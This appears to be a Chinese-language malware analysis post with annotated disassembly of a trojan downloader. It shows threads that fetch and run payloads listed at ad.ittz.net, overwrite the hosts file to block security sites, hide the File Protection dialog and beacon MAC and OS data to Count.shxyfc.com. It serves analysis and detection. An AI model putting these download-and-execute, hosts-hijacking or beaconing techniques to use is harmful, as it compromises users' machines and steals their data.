004014B6 |. 50 ||push eax ; 0012F82C 0012FB40 ASCII "http://ad.ittz.net:72/ad.txt"
004014B7 |. E8 6BF8FFFF ||call <下载文件>
004014BC |. 59 ||pop ecx
004014BD |. 83F8 01 ||cmp eax, 1
004014C0 |. 59 ||pop ecx
004014C1 |. 74 0D ||je short 004014D0
004014C3 |. 68 88130000 ||push 1388 ; /Timeout = 5000. ms
004014C8 |. FF15 80044000 ||call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
……(中间省略)下面还有一个线程:
00401549 |> \8D4D C0 ||lea ecx, [local.16]
0040154C |. 51 ||push ecx
0040154D |. 53 ||push ebx
0040154E |. 50 ||push eax
0040154F |. 68 5C164000 ||push 0040165C 线程 5
00401554 |. 53 ||push ebx
00401555 |. 53 ||push ebx
00401556 |. FFD6 ||call esi ; kernel32.CreateThread
00401558 |. 68 C0D40100 ||push 1D4C0 ; /Timeout = 120000. ms
0040155D |. 50 ||push eax ; |hObject
0040155E |. FF15 48044000 ||call dword ptr [<&KERNEL32.WaitForSingleOb>; \WaitForSingleObject
线程 5 的主要作用是下载 ad.txt 列表中的病毒木马并运行。
线程1 隐藏窗口
; ---------------------------------------------------------------------------
; thread1_hide_wfp_dialog()   [thread procedure; loops forever, never returns]
; Polls every 50 ms for a dialog of class "#32770" titled "Windows 文件保护"
; (the Windows File Protection prompt, presumably raised when the sample
; replaces Explorer.EXE). When found it reads GWL_STYLE and is meant to hide
; the window with ShowWindow(SW_HIDE).
; NOTE(review): as listed, `or eax, 10000000` always leaves ZF clear, so the
; following `jnz` is always taken and the ShowWindow path at
; 00400F18-00400F29 looks unreachable - presumably a `test` was intended;
; confirm dynamically before relying on "the dialog gets hidden".
; The helper at 00400AE1 (args 004007A4, 0) is not shown in this listing.
; ---------------------------------------------------------------------------
00400EF1 . 56 push esi
00400EF2 > 68 C0074000 push 004007C0 ; /Title = "Windows 文件保护"  (Windows File Protection)
00400EF7 . 68 B8074000 push 004007B8 ; |Class = "#32770"  (standard dialog class)
00400EFC . FF15 3C054000 call dword ptr [<&USER32.FindWindowA>] ; \FindWindowA
00400F02 . 8BF0 mov esi, eax ; esi = hWnd or NULL
00400F04 . 85F6 test esi, esi
00400F06 . 74 27 je short 00400F2F ; not present: sleep and retry
00400F08 . 6A F0 push -10 ; /Index = GWL_STYLE
00400F0A . 56 push esi ; |hWnd
00400F0B . FF15 38054000 call dword ptr [<&USER32.GetWindowLongA>] ; \GetWindowLongA
00400F11 . 0D 00000010 or eax, 10000000 ; 10000000h = WS_VISIBLE; the result is never zero
00400F16 . 75 17 jnz short 00400F2F ; always taken as compiled (see header note)
00400F18 . 6A 00 push 0
00400F1A . 68 A4074000 push 004007A4
00400F1F . E8 BDFBFFFF call 00400AE1 ; purpose not visible here
00400F24 . 59 pop ecx
00400F25 . 59 pop ecx
00400F26 . 6A 00 push 0 ; /ShowState = SW_HIDE
00400F28 . 56 push esi ; |hWnd
00400F29 . FF15 44054000 call dword ptr [<&USER32.ShowWindow>] ; \ShowWindow
00400F2F > 6A 32 push 32 ; /Timeout = 50. ms
00400F31 . FF15 80044000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00400F37 .^ EB B9 jmp short 00400EF2 ; loop forever
线程2
004011FC |. 68 CC054000 push 004005CC ; /src = "http://ad.ittz.net:72/hosts.txt"
00401201 |. 50 push eax ; |dest
00401202 |. E8 610F0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401207 |. 83C4 20 add esp, 20
0040120A |. 8D85 ECFDFFFF lea eax, [local.133]
00401210 |. 68 1C084000 push 0040081C ; /String2 = "http://host"
00401215 |. 50 push eax ; |String1
00401216 |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
0040121C |. 85C0 test eax, eax
0040121E |. 74 43 je short 00401263
00401220 |. 8D85 ECFEFFFF lea eax, [local.69]
00401226 |. 56 push esi ; /BufSize
00401227 |. 50 push eax ; |Buffer
00401228 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
0040122E |. 8D45 EC lea eax, [local.5]
00401231 |. 50 push eax ; /src
00401232 |. 8D85 ECFEFFFF lea eax, [local.69] ; |
00401238 |. 50 push eax ; |dest
00401239 |. E8 620F0000 call <jmp.&MSVCRT.strcat> ; \strcat
0040123E |. 8D85 ECFEFFFF lea eax, [local.69]
00401244 |. 50 push eax
00401245 |. 8D85 ECFDFFFF lea eax, [local.133]
0040124B |. 50 push eax ; "http://ad.ittz.**net:72/hosts.txt"
0040124C |. E8 D6FAFFFF call <下载文件> ; 从指定网址下载文档替换%SystemRoot%\system32\drivers\etc\hosts文件,用以屏蔽大量安全软件网址
00401251 |. 83C4 10 add esp, 10
00401254 |. 8D85 ECFEFFFF lea eax, [local.69]
0040125A |. 6A 01 push 1 ; /FileAttributes = READONLY
0040125C |. 50 push eax ; |FileName
0040125D |. FF15 5C044000 call dword ptr [<&KERNEL32.SetFileAttributes>; \SetFileAttributesA
00401263 |> 33C0 xor eax, eax
00401265 |. 5E pop esi
00401266 |. C9 leave
00401267 \. C3 retn
线程3 连接指定网站,并将用户系统版本网卡MAC地址等信息发送到该网站数据库中。
; ---------------------------------------------------------------------------
; thread3_beacon()   [thread procedure; returns 0]
; Builds http://Count.shxyfc.com:88/Count.asp?mac=<id>&ver=FM01|2011-08-25
; &os=<version string>&dtime=2011-8-2 in the 101h-byte stack buffer at
; [local.68] and requests it with InternetOpenUrlA (INTERNET_FLAG_RELOAD)
; through the WinINet copy loaded as ope14F (see call 2). The user agent
; given to InternetOpenA is "baidu". On this run the debugger showed
; mac=730070000000 and an empty os= field.
; Network indicators: host Count.shxyfc.com, port 88, path /Count.asp,
; User-Agent "baidu".
; Guard: if the configured URL compares equal (case-insensitive) to
; "http://count" the thread does nothing - an "unconfigured" placeholder check.
; Handles: on success neither the URL handle nor the session is closed; the
; session is closed only when InternetOpenUrlA fails.
; Helpers not shown here: 00400E0E (called before the mac string is copied -
; presumably fills it in; confirm) and 00400FC2 (returns the os string;
; labelled GetVersionExA by the author).
; ---------------------------------------------------------------------------
00400FFF /. 55 push ebp ;
00401000 |. 8BEC mov ebp, esp
00401002 |. 81EC 10030000 sub esp, 310
00401008 |. 53 push ebx
00401009 |. 56 push esi
0040100A |. BE FF000000 mov esi, 0FF ; buffer size reused for both memsets
0040100F |. 33DB xor ebx, ebx ; ebx = 0 for every NULL/0 argument
00401011 |. 56 push esi ; /n => FF (255.)
00401012 |. 8D85 F0FDFFFF lea eax, [local.132] ; |URL buffer
00401018 |. 53 push ebx ; |c => 00
00401019 |. 50 push eax ; |s
0040101A |. E8 43110000 call <jmp.&MSVCRT.memset> ; \memset
0040101F |. 56 push esi ; /n
00401020 |. 8D85 F0FCFFFF lea eax, [local.196] ; |mac buffer
00401026 |. 53 push ebx ; |c
00401027 |. 50 push eax ; |s
00401028 |. E8 35110000 call <jmp.&MSVCRT.memset> ; \memset
0040102D |. 8D85 F0FDFFFF lea eax, [local.132]
00401033 |. 68 26064000 push 00400626 ; /src = "http://Count.shxyfc.com:88/Count.asp"  (reporting URL)
00401038 |. 50 push eax ; |dest
00401039 |. E8 2A110000 call <jmp.&MSVCRT.strcpy> ; \strcpy
0040103E |. 83C4 20 add esp, 20 ; drop the 8 cdecl arguments above
00401041 |. 8D85 F0FDFFFF lea eax, [local.132]
00401047 |. 68 0C084000 push 0040080C ; /String2 = "http://count"
0040104C |. 50 push eax ; |String1
0040104D |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
00401053 |. 85C0 test eax, eax
00401055 |. 0F84 1C010000 je 00401177 ; URL is the placeholder: skip the beacon
0040105B |. E8 AEFDFFFF call 00400E0E ; not shown in this listing
00401060 |. 8D85 F0FCFFFF lea eax, [local.196]
00401066 |. 68 A4064000 push 004006A4 ; /src = "730070000000"  (mac value as seen in this run)
0040106B |. 50 push eax ; |dest
0040106C |. E8 F7100000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401071 |. 59 pop ecx
00401072 |. 59 pop ecx
00401073 |. 53 push ebx ; dwFlags = 0
00401074 |. 53 push ebx ; lpszProxyBypass = NULL
00401075 |. 53 push ebx ; lpszProxy = NULL
00401076 |. 53 push ebx ; dwAccessType = 0 (INTERNET_OPEN_TYPE_PRECONFIG)
00401077 |. 68 04084000 push 00400804 ; ASCII "baidu"  (lpszAgent: the HTTP User-Agent)
0040107C |. FF15 30234000 call dword ptr [402330] ; ope14F.InternetOpenA
00401082 |. 3BC3 cmp eax, ebx
00401084 |. 8945 FC mov [local.1], eax ; local.1 = WinINet session handle
00401087 |. 0F84 EA000000 je 00401177 ; no session: leave
0040108D |. 57 push edi
0040108E |. 6A 40 push 40
00401090 |. 59 pop ecx ; ecx = 40h dwords
00401091 |. 33C0 xor eax, eax
00401093 |. 8DBD F1FEFFFF lea edi, dword ptr [ebp-10F]
00401099 |. 889D F0FEFFFF mov byte ptr [ebp-110], bl ; zero [local.68] (101h bytes): the request-URL buffer
0040109F |. F3:AB rep stos dword ptr es:[edi]
004010A1 |. 66:AB stos word ptr es:[edi]
004010A3 |. AA stos byte ptr es:[edi]
004010A4 |. BE FC074000 mov esi, 004007FC ; ASCII "?mac="
004010A9 |. 8D7D F4 lea edi, [local.3]
004010AC |. 8D85 F0FDFFFF lea eax, [local.132]
004010B2 |. A5 movs dword ptr es:[edi], dword ptr [esi] ; copy "?mac=" (6 bytes incl. NUL) into local.3
004010B3 |. 50 push eax ; /src
004010B4 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010BA |. 50 push eax ; |dest
004010BB |. 66:A5 movs word ptr es:[edi], word ptr [esi] ; |
004010BD |. E8 A6100000 call <jmp.&MSVCRT.strcpy> ; \strcpy  (request = base URL)
004010C2 |. 8D45 F4 lea eax, [local.3]
004010C5 |. 50 push eax ; //src = "?mac="
004010C6 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010CC |. 50 push eax ; |dest
004010CD |. E8 CE100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010D2 |. 8D85 F0FCFFFF lea eax, [local.196]
004010D8 |. 50 push eax ; /src  (mac value)
004010D9 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010DF |. 50 push eax ; |dest
004010E0 |. E8 BB100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010E5 |. 8D85 F0FEFFFF lea eax, [local.68]
004010EB |. 68 F4074000 push 004007F4 ; /src = "&ver="
004010F0 |. 50 push eax ; |dest
004010F1 |. E8 AA100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010F6 |. 8D85 F0FEFFFF lea eax, [local.68]
004010FC |. 68 80064000 push 00400680 ; /src = "FM01|2011-08-25"  (hard-coded build tag)
00401101 |. 50 push eax ; |dest
00401102 |. E8 99100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401107 |. 8D85 F0FEFFFF lea eax, [local.68]
0040110D |. 68 EC074000 push 004007EC ; /src = "&os="
00401112 |. 50 push eax ; |dest
00401113 |. E8 88100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401118 |. E8 A5FEFFFF call 00400FC2 ; \GetVersionExA  (author's label: helper returning an OS-version string in eax; empty on this run)
0040111D |. 50 push eax ; /src
0040111E |. 8D85 F0FEFFFF lea eax, [local.68] ; |
00401124 |. 50 push eax ; |dest
00401125 |. E8 76100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040112A |. 8D85 F0FEFFFF lea eax, [local.68]
00401130 |. 68 E4074000 push 004007E4 ; /src = "&dtime="
00401135 |. 50 push eax ; |dest
00401136 |. E8 65100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040113B |. 83C4 40 add esp, 40 ; drop the 16 cdecl arguments pushed since the last clean-up
0040113E |. 8D85 F0FEFFFF lea eax, [local.68]
00401144 |. 68 94064000 push 00400694 ; /src = "2011-8-2"  (hard-coded string, not the current date)
00401149 |. 50 push eax ; |dest
0040114A |. E8 51100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040114F |. 59 pop ecx
00401150 |. 8D85 F0FEFFFF lea eax, [local.68]
00401156 |. 59 pop ecx
00401157 |. 53 push ebx ; dwContext = 0
00401158 |. 68 00000080 push 80000000 ; dwFlags = INTERNET_FLAG_RELOAD (bypass the cache)
0040115D |. 53 push ebx ; dwHeadersLength = 0
0040115E |. 53 push ebx ; lpszHeaders = NULL
0040115F |. 50 push eax ; lpszUrl
00401160 |. FF75 FC push [local.1] ; hInternet  01D6FC84 01D6FEA4 ASCII "http://Count.shxyfc.com:88/Count.asp?mac=730070000000&ver=FM01|2011-08-25&os=&dtime=2011-8-2"
00401163 |. FF15 44234000 call dword ptr [402344] ; ope14F.InternetOpenUrlA - the beacon request is sent here
00401169 |. 85C0 test eax, eax
0040116B |. 5F pop edi
0040116C |. 75 09 jnz short 00401177 ; success: return without closing either handle
0040116E |. FF75 FC push [local.1]
00401171 |. FF15 48234000 call dword ptr [402348] ; ope14F.InternetCloseHandle  (only on failure)
00401177 |> 5E pop esi
00401178 |. 33C0 xor eax, eax ; thread exit code 0
0040117A |. 5B pop ebx
0040117B |. C9 leave
0040117C \. C3 retn
驱动文件部分(下面的 IDA 反汇编片段,DriverEntry 中创建设备对象和符号链接的代码)可参考这个帖子:http://bbs.pediy.com/showthread.php?t=90248
.text:00012178
.text:00012178 loc_12178: ; CODE XREF: start+32j
.text:00012178 mov DestinationString.MaximumLength, bx
.text:0001217F mov DestinationString.Length, bx
.text:00012186
.text:00012186 loc_12186: ; CODE XREF: start+40j
.text:00012186 mov esi, [ebp+DriverObject]
.text:00012189 mov edi, ds:RtlInitUnicodeString
.text:0001218F mov eax, offset sub_104CC
.text:00012194 mov [esi+38h], eax
.text:00012197 mov [esi+40h], eax
.text:0001219A push offset SourceString ; SourceString
.text:0001219F lea eax, [ebp+DestinationString]
.text:000121A2 push eax ; DestinationString
.text:000121A3 mov dword ptr [esi+70h], offset sub_11C60
.text:000121AA call edi ; RtlInitUnicodeString
.text:000121AC lea eax, [ebp+DeviceObject]
.text:000121AF push eax ; DeviceObject
.text:000121B0 push ebx ; Exclusive
.text:000121B1 push 100h ; DeviceCharacteristics
.text:000121B6 push 22h ; DeviceType
.text:000121B8 lea eax, [ebp+DestinationString]
.text:000121BB push eax ; DeviceName
.text:000121BC push 208h ; DeviceExtensionSize
.text:000121C1 push esi ; DriverObject
.text:000121C2 call ds:IoCreateDevice
.text:000121C8 mov esi, eax
.text:000121CA cmp esi, ebx
.text:000121CC jl short loc_121F6
.text:000121CE push offset word_1210E ; SourceString
.text:000121D3 lea eax, [ebp+SymbolicLinkName]
.text:000121D6 push eax ; DestinationString
.text:000121D7 call edi ; RtlInitUnicodeString
.text:000121D9 lea eax, [ebp+DestinationString]
.text:000121DC push eax ; DeviceName
.text:000121DD lea eax, [ebp+SymbolicLinkName]
.text:000121E0 push eax ; SymbolicLinkName
.text:000121E1 call ds:IoCreateSymbolicLink
.text:000121E7 mov esi, eax
.text:000121E9 cmp esi, ebx
.text:000121EB jge short loc_12209
.text:000121ED push [ebp+DeviceObject] ; DeviceObject
.text:000121F0 call ds:IoDeleteDevice
.text:000121F6
.text:000121F6 loc_121F6: ; CODE XREF: start+96j
.text:000121F6 mov eax, DestinationString.Buffer
.text:000121FB cmp eax, ebx
.text:000121FD jz short loc_12242
.text:000121FF push ebx ; Tag
.text:00012200 push eax ; P
.text:00012201 call ds:ExFreePoolWithTag
.text:00012207 jmp short loc_12242
大体流程分析完了:这个下载者通过 InternetOpenUrlA 向 Count.shxyfc.com:88/Count.asp 发送 mac、ver、os、dtime 等参数作为上线统计(见上面 00401160 处的 URL),该域名和 URL 可作为检测用的网络特征。有兴趣的同学可以下载了自己分析。
压缩包解压密码为 virus。注意:附件是真实的恶意样本,请只在隔离的虚拟机或分析环境中解压和运行,不要在日常使用的机器上直接打开。